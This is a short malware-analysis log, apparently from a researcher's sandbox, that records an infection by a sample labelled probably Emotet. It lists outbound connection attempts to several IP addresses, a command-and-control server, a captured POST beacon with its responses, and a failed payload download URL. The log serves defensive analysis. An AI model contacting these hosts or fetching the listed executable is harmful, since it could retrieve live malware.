# Timeline ##Fri Apr 10 09:54:27 CEST 2015 started win2 ## Fri Apr 10 09:50:07 CEST 2015 infected with 8baa9b809b591a11af423824f4d9726a.exe Probably Emotet So far the SYN requests were for - 119.59.124.163.8080 - 192.163.239.60.8080 - 188.126.72.179.8080 - 200.159.128.132.8080 - 195.219.57.34.8080 - 64.207.134.54.8080 - 103.245.153.70.8080 - 178.23.244.51.8080 - 103.228.200.37.8080 - There are more... On 2015, Apr 14th 11:22am the C&C server 202.44.54.4 port 8080/TCP start working. A POST connection with encrypted data. > POST /83736aa6/806782973.php HTTP/1.1 > Accept: */* > User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0) > Host: 202.44.54.4:8080 > Content-Length: 197 > Connection: Keep-Alive > Cache-Control: no-cache First the answer was HTTP/1.1 502 Bad Gateway Server: nginx Date: Tue, 14 Apr 2015 09:23:17 GMT Content-Type: text/html Content-Length: 568 Connection: keep-alive And then the real communication: HTTP/1.1 200 OK Server: nginx Date: Tue, 14 Apr 2015 09:36:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding A lot of information sent at first. A failed update http://77.55.74.118/Xj3i4z6wPYy/8a1.exe ```